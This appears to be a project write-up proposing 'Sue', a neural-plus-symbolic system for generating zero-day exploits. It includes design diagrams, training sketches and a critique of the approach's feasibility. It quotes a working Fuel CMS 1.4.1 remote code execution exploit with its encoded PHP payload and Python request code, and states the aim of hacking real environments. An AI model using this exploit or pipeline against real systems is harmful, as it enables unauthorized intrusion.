Is it possible for the AI (LLM + Symbolic Execution) to discover zero-day vulnerabilities automatically?
The final result should be the combination of a vulnerability hypothesis and a proof-of-concept (PoC) to validate it. These inputs and logic paths must be imagined by Sue.
╔══════════════════════════════════════════════════════════════════════════════╗
║ PHASE 1 & 2: DATA PIPELINE (INGESTION & TOKENIZATION) ║
╚══════════════════════════════════════════════════════════════════════════════╝
│
├─ PROCESS: Ingests raw exploits, CVEs, and patch diffs. Separates logic
│ from payload. Converts code into token embeddings (Vectors).
│
└─ OUTPUT: Fine-Tuning Dataset for the Neuro-Symbolic Model.
╔══════════════════════════════════════════════════════════════════════════════╗
║ PHASE 3: NEURO-SYMBOLIC CORE (LLM + FUZZING) ║
╚══════════════════════════════════════════════════════════════════════════════╝
│
├─ GROUP A: HYPOTHESIS GENERATOR (The "Artist")
│ └─ Model: Sue-LLM (Transformer)
│ └─ Generates vulnerability hypotheses, fuzzing seeds, and
│ mutation strategies (not just static code).
│
└─ GROUP C: COVERAGE VALIDATOR (The "Critic")
├─ Model: Reward Engine (Symbolic/Fuzzer)
│ └─ Answers: "Did this input reach a new code path or cause a crash?"
│
└─ FEEDBACK LOOP: Uses Reinforcement Learning to reward the LLM for
discovering divergent execution traces (Coverage-guided).
╔══════════════════════════════════════════════════════════════════════════════╗
║ PHASE 4: EXPLOIT ASSEMBLY & SYMBOLIC EXECUTION ║
╚══════════════════════════════════════════════════════════════════════════════╝
│
└─ GROUP G1: SYNTHESIZER
└─ Model: Hybrid-Assembler
└─ Combines the neural hypothesis with symbolic constraints to
generate a functional Proof-of-Concept (PoC).
╔══════════════════════════════════════════════════════════════════════════════╗
║ PHASE 5: VIRTUAL VALIDATION & FEEDBACK LOOP ║
╚══════════════════════════════════════════════════════════════════════════════╝
│
├─ PROCESS: The PoC is executed in a strictly instrumented sandbox.
│
├─ GROUP G2: EXECUTION VALIDATOR
│ └─ Model: SandboxMonitor (Instrumentation)
│ └─ Answers: "Did we corrupt memory or bypass a check?"
│ -> Returns a high-fidelity Reward Score.
│
└─ GROUP G3: THREAT COMPARATOR
└─ Model: BehaviorAnalyst (Independent)
└─ Answers: "Is this a reproducible vulnerability or just noise?"
Here is the comprehensive list of models (LLM or GAN) with their detailed properties.
| Model Name | Phase | Group | Type | Trained With | Receives | Answers/Produces |
|---|---|---|---|---|---|---|
| PayloadArtist | 3 | P | Generator | Adversarially, with feedback from PayloadCritic. | A random noise vector. | Produces: A new, synthetic payload vector. |
| PayloadCritic | 3 | P | Discriminator (Independent, Pre-trained) | Vectors of real payloads from Exploit-DB. | A single payload vector (real or synthetic). | Answers: "How similar is this to real payloads?" |
| CodeArtist | 3 | C | Generator | Adversarially, with feedback from CodeCritic. | A random noise vector. | Produces: A new, synthetic code structure vector. |
| CodeCritic | 3 | C | Discriminator (Pre-trained) | Vectors of real exploit code structures. | A single code vector (real or synthetic). | Answers: "Is this a valid exploit code structure?" |
| ExploitAssembler | 4 | G1 | Generator (Assembler) | Assembled exploit scripts and validation feedback. | A payload vector and a code vector. | Produces: A full proof-of-concept script. |
| SandboxValidator | 5 | G2 | Validator (Independent) | Logs and network traffic from sandbox tests. | Execution logs from a single sandbox test. | Answers: "Did the exploit actually work?" |
| ThreatComparator | 5 | G3 | Validator (Independent) | Behavioral logs from real and generated attacks. | Logs from a single generated attack. | Answers: "Does this behave like a known threat?" |
I have been doing the courses at https://tryhackme.com/. They are good and I recommend them, but you are not going to hack any real environment with them. (Nobody is going to get into any website whose sysadmins know how to press the update button.) We have extensive experience with neural networks.
To hack real environments you need to find a zero-day exploit, which you can obtain:
- Through a honeypot: create an artificially vulnerable environment, wait for a MASTER hacker to show up and attack you, collect the attack code there, and keep the zero-day.
- By knowing a lot and fabricating the vulnerability yourself (you could spend a lifetime doing low-level reverse engineering before finding one).
Can you feed a Neuro-Symbolic AI with previously known exploit code and have it end up generating zero-day exploits?
Note: In this project the word AI will not be used again. It is a marketing word; when programming IT MEANS NOTHING. Every time a programmer says AI instead of Reinforcement Learning, TensorFlow, PyTorch, or Decision Tree, a kitten dies XD
Originally, this project looked at GANs (Deep Convolutional Generative Adversarial Networks). In a GAN, two models are trained simultaneously in an adversarial process: the Generator ("the artist") learns to create images that look real, while the Discriminator ("the art critic") learns to differentiate real images from fake ones.
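A minimal PyTorch sketch of that artist/critic dynamic is below. The layer sizes and the 256-float "payload embedding" dimension are illustrative assumptions of ours, not the project's actual models:

```python
import torch
import torch.nn as nn

NOISE_DIM, DATA_DIM = 64, 256  # illustrative: a 256-float payload embedding

generator = nn.Sequential(        # "the artist"
    nn.Linear(NOISE_DIM, 128), nn.ReLU(),
    nn.Linear(128, DATA_DIM), nn.Tanh(),
)
discriminator = nn.Sequential(    # "the art critic"
    nn.Linear(DATA_DIM, 128), nn.LeakyReLU(0.2),
    nn.Linear(128, 1), nn.Sigmoid(),
)
bce = nn.BCELoss()
g_opt = torch.optim.Adam(generator.parameters(), lr=2e-4)
d_opt = torch.optim.Adam(discriminator.parameters(), lr=2e-4)

def train_step(real_batch: torch.Tensor) -> None:
    n = real_batch.size(0)
    fake = generator(torch.randn(n, NOISE_DIM))

    # Critic step: score real payload vectors as 1, synthetic ones as 0.
    d_opt.zero_grad()
    d_loss = (bce(discriminator(real_batch), torch.ones(n, 1)) +
              bce(discriminator(fake.detach()), torch.zeros(n, 1)))
    d_loss.backward()
    d_opt.step()

    # Artist step: try to make the critic score synthetic vectors as real.
    g_opt.zero_grad()
    g_loss = bce(discriminator(fake), torch.ones(n, 1))
    g_loss.backward()
    g_opt.step()
```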
While we now use LLMs (Transformers) because code is sequential, we must also acknowledge that code requires logic, not just patterns. Therefore, we combine the "Creative" LLM with a "Logical" Symbolic Engine.
For more details on GAN technology, see the classic example of creating images of a hybrid animal between horses and zebras.
Remember that although the examples are with images, for the model an image (a matrix of 360 width x 360 height x 3 colors) and a Python code (a tokenized matrix of N tokens) are the same thing: a data array.
However, because exploits are brittle (one wrong byte = failure), we cannot just "blend" them like images. We use Tokenization for the structure and Symbolic Analysis for the logic.
An exploit is a code or set of codes that lets you take advantage of an "extra function" of the attacked server. The attacked server is not aware that this extra function was accidentally created during its development.
Here we can see a good example of an exploit, https://www.exploit-db.com/exploits/50477, for servers running the Fuel CMS v1.4.1 library (https://www.getfuelcms.com/):
- A search request is made to http://attacked-server.com/fuel/pages/select/?filter=
- The payload is appended behind it: %27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27
- After the payload comes a console (cmd) command, for example one that simply lists the files on the server: dir /l
- It ends with the closing concatenation of the payload: %27%29%2b%27

The server will return the list of files, and with any other cmd instruction the machine is totally hacked.
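As a quick sanity check (not part of the original exploit), decoding the URL-encoded payload with Python's standard library shows the injected PHP in clear text:

```python
from urllib.parse import unquote

payload = ("%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27"
           "%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27")
# The filter parameter decodes to a PHP injection that assigns
# $a = 'system' and then calls it on the attacker's command.
print(unquote(payload))  # -> '+pi(print($a='system'))+$a('
```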
The Python code looks like this (imports added so the snippet is self-contained; in the original exploit at the link, url comes from a command-line argument and the request runs in a loop):

    import requests
    from urllib.parse import quote
    from colorama import Fore, Style

    url = "http://attacked-server.com"  # target base URL
    cmd = input(Style.BRIGHT + Fore.YELLOW + "Enter Command $" + Style.RESET_ALL)
    main_url = url + "/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27" + quote(cmd) + "%27%29%2b%27"
    r = requests.get(main_url)

From this explanation and this link https://www.exploit-db.com/exploits/50477, the sweet part is the payload; the rest of the code is auxiliary Python. The main idea is to create a Hybrid System to discover these logic flaws.
To create AI images of horses that look like zebras we need a large dataset of images of zebras and horses.
To create the payload you need to collect all the Python exploits (in the first versions only Python will be used; keep in mind that the languages will be expanded later). Roughly 98% of known exploits can be found on these sites:
- https://www.exploit-db.com/ The Exploit Database, maintained by OffSec. It is the de facto public archive of exploits and proof-of-concepts.
- https://nvd.nist.gov/vuln/full-listing USA National Vulnerability Database
- https://www.tenable.com/products/nessus Free or paid version
- https://www.rapid7.com/db Vulnerability & Exploit Database (use in Metasploit https://docs.rapid7.com/metasploit/managing-the-database/ )
- https://github.com/ You can search GitHub by keywords such as "PoC", "vulnerability", or a "CVE" identifier
For the Python exploit codes to enter the neural network, tokenization (text-to-vector transformation) is required. Each natural language (English, French, ...) requires its own tokenization system (more information on what tokenization is: https://www.tensorflow.org/text/guide/tokenizers).
You can play with tokenization the way ChatGPT does it here: https://platform.openai.com/tokenizer
Programming languages likewise require their own tokenization mode. There are libraries and articles that can help with this process. Tokenizers for Python source:
- https://benjam.info/blog/posts/2019-09-18-python-deep-dive-tokenizer/ entire reading is recommended
- https://docs.python.org/3/library/tokenize.html https://documentation.help/Python-3.6.8/tokenize.html
- https://pypi.org/project/code-tokenize/
- https://github.com/huggingface/tokenizers/tree/main?tab=readme-ov-file#bindings
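As a minimal sketch of what these tools produce, the standard-library tokenize module (second link above) already splits Python source into typed tokens; the sample line is ours and purely illustrative:

```python
import io
import tokenize

source = 'r = requests.get(url + quote(cmd))'  # an exploit-style line

for tok in tokenize.generate_tokens(io.StringIO(source).readline):
    # tok_name maps the numeric token type to a readable label (NAME, OP, ...)
    print(f"{tokenize.tok_name[tok.type]:<10} {tok.string!r}")
```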
**Training: Actor (Generator) and Critic (Coverage Analyzer)**

The Actor ("Sue-LLM") must generate inputs, mutation strategies, and hypotheses.
The Critic (Coverage Analyzer) must answer the question: did we reach a new state or crash the application?
To really check this, a real machine is required, and this environment is complex. We do not just look for "valid code"; we look for execution anomalies. The Reward Model must verify code coverage (like AFL++ or libFuzzer); a sketch of such a reward follows. Training focuses on finding divergent paths. It would also help a lot to understand the steps the programmer-hacker took to discover each exploit.
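A hypothetical sketch of such a coverage-based reward, assuming the sandbox returns the set of AFL++-style edge IDs hit by one execution. The names coverage_reward and seen_edges are ours, not an existing API:

```python
# Global set of code-path edges observed so far across all executions.
seen_edges: set[int] = set()

def coverage_reward(edges_hit: set[int], crashed: bool) -> float:
    """Reward the Actor for new code paths; strongly reward crashes."""
    new_edges = edges_hit - seen_edges
    seen_edges.update(new_edges)
    reward = 0.1 * len(new_edges)  # dense signal: every new edge pays a little
    if crashed:
        reward += 10.0             # sparse signal: a crash pays a lot
    return reward
```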
*Feel free to comment on changes.*
- Collect the .py files from the exploit databases (DBs) listed above.
- Tokenize inside each .py. The code is one thing and the payload is another; they must be separated (a heuristic sketch follows this list).
- Generation of the Coverage Engine (the Critic). This is not just a neural network but a fuzzer that answers: did we find a new path?
- Creation of the Actor (the Generator/LLM). It should generate hypotheses and inputs that maximize the coverage found by the Critic.
- Evaluation: creation of real virtualized environments (sandboxes) for testing the generated hypotheses. This tool will generate around 100,000 inputs of which only one will work. The one that works XD
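The separation in the second step could start with a simple heuristic; this sketch is an assumption of ours, flagging string literals that look like runs of URL-encoded bytes:

```python
import io
import re
import tokenize

# Hypothetical heuristic: string literals containing 4+ consecutive
# URL-encoded bytes are treated as payloads, everything else as code.
PAYLOAD_RE = re.compile(r"(%[0-9a-fA-F]{2}){4,}")

def split_code_and_payloads(source: str):
    payloads, code_tokens = [], []
    for tok in tokenize.generate_tokens(io.StringIO(source).readline):
        if tok.type == tokenize.STRING and PAYLOAD_RE.search(tok.string):
            payloads.append(tok.string)
            code_tokens.append("<PAYLOAD>")  # placeholder in the code stream
        else:
            code_tokens.append(tok.string)
    return code_tokens, payloads
```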
**The GAN-to-LLM Analogy: Where It Breaks Down**

The core insight, that an image matrix and a code token matrix are mathematically equivalent, is true but operationally misleading for exploit generation. Images vs. exploits: fundamentally different search spaces:
- Images: High-dimensional, continuous space, graceful degradation ("a slightly wrong pixel doesn't matter")
- Exploits: Low-dimensional semantically, discrete and brittle logic ("one missing byte = exploit fails")
The exploit search space is astronomically sparse compared to image generation. A payload must precisely match compiler behavior, memory layout, protocol state, target version, and runtime environment. Gradient-based search through this space has fundamental limitations.
**Core Problem #1: Zero-Days Are Not Statistical Patterns.** A zero-day vulnerability is typically caused by:
- Logic bugs and unexpected state transitions
- Undefined behavior and memory safety violations
- Protocol edge cases and human error in implementation
These are not statistically frequent patterns in training data. An LLM trained on "exploits that worked" learns the form of exploits, not the reasoning that makes them work. It cannot invent causes it has never seen the consequences of.
**Core Problem #2: The Reward Model Cannot Judge Exploit Validity.** The current reward model asks: "Does this code look logically sound?" This is insufficient because:
- Exploits are environment-dependent (ASLR, DEP, CFI break synthetic exploits)
- Syntax correctness ≠ vulnerability
- Behavioral similarity ≠ exploitability
- A sandbox validator ≠ real-world ground truth
Modern mitigations break payloads that work in test environments. Many zero-days require precise heap grooming or state manipulation that cannot be reliably tested in isolation.
**Core Problem #3: Reward Signal Sparsity.** The architecture assumes "generate around 100,000 payloads of which only one will work." That is a 1-in-100,000 hit rate (a back-of-the-envelope sketch follows this list). For RLHF to converge with such sparse rewards:
- Credit assignment becomes nearly impossible
- Gradient updates are barely distinguishable from noise
- Convergence time becomes prohibitively long
- The signal-to-noise ratio is fundamentally problematic for policy gradient methods
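A back-of-the-envelope illustration of this sparsity (the one-second sandbox cost is an assumption of ours):

```python
# With a 1-in-100,000 hit rate, the expected number of rollouts before the
# policy sees a single positive reward is the mean of a geometric distribution.
hit_rate = 1 / 100_000
rollouts_per_reward = 1 / hit_rate      # = 100,000 rollouts on average
seconds_per_rollout = 1.0               # assumed cost of one sandboxed run

hours = rollouts_per_reward * seconds_per_rollout / 3600
print(f"{rollouts_per_reward:,.0f} rollouts = {hours:.1f} h per reward signal")
# -> 100,000 rollouts = 27.8 h per reward signal
```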
**Core Problem #4: Missing Symbolic Grounding.** The current architecture is missing components essential for reasoning about discrete constraints:
- ❌ Static program analysis
- ❌ Dynamic taint tracking
- ❌ Symbolic execution
- ❌ Constraint solvers
- ❌ Coverage-guided fuzzing feedback
Without these, the Transformer is blind to the actual vulnerability mechanics. It cannot reason about why an exploit works, only recognize superficial patterns of exploits that did work.
**Realistic Capabilities vs. Claims.** What Sue CAN realistically do:
- ✅ Payload variant generation (mutations of known exploits)
- ✅ Input synthesis and fuzzing strategy suggestions
- ✅ Crash discovery through guided exploration
- ✅ Bug hypothesis generation (structural/semantic guessing)
- ✅ Boilerplate code generation around known vulnerability patterns
What Sue CANNOT realistically do (currently):
- ❌ True zero-day invention (requires semantic understanding of the target source)
- ❌ Reliable RCE discovery without symbolic execution
- ❌ Autonomous exploitation without environment introspection
- ❌ Novel vulnerability detection without taint tracking
**Path Forward: Neurosymbolic Integration.** For Sue to achieve its ambitious goals, the architecture should evolve toward a hybrid approach:
- Reframe Sue as a Vulnerability Hypothesis Generator rather than Exploit Generator. Sue outputs input structures, protocol states, and mutation strategies—not final payloads.
- Replace "looks valid" rewards with coverage-based signals: Track new code paths reached, unique crash types, divergent execution traces, and heap corruption indicators. This aligns with modern fuzzers (AFL++, libFuzzer).
- Integrate symbolic analysis layers: Sue's outputs should feed into static analysis, dynamic taint tracking, and coverage-guided fuzzing loops. The neural model guides the search; symbolic engines do the reasoning (a constraint-solving sketch follows below).
- Focus learning on vulnerability classes rather than exploit form: Parser confusion, deserialization, integer overflow, type confusion—structural patterns that symbolic tools can reason about and test.
Modern successful systems combine neural guidance with symbolic reasoning. Neural models excel at search space navigation; symbolic engines excel at constraint satisfaction. Sue should leverage both.
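As a minimal sketch of what "symbolic engines do the reasoning" means in practice, here is a toy constraint query using the Z3 solver. The scenario (a 16-bit length field that wraps past a parser's sanity check) is a hypothetical example of ours, not part of Sue:

```python
from z3 import BitVec, Solver, UGT, ULT, sat

# Symbolic 16-bit length field: find a concrete value that passes the
# parser's "non-empty" check yet wraps around when a 64-byte header is added.
n = BitVec("input_len", 16)
s = Solver()
s.add(UGT(n, 0))        # sanity check the parser enforces
s.add(ULT(n + 64, n))   # unsigned overflow: n + 64 wraps below n

if s.check() == sat:
    print("candidate PoC length:", s.model()[n])  # any value >= 65472
```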
**We are currently developing privately; if you want to join the team, please contact us: https://www.linkedin.com/in/luislcastillo/**

##### The name Sue

The name is a curious tribute to Argentina 🇦🇷 🌞. Sue Carpenter is the nurse who took Diego Maradona off the field at the 1994 USA soccer World Cup ⚽ (Foxboro Stadium, Massachusetts, June 25; Argentina beat Nigeria 2-1). Sue was the only person who could stop Diego; no other soccer player in history could stop him. "The tool that stopped the God of soccer." After that he never played for Argentina again.







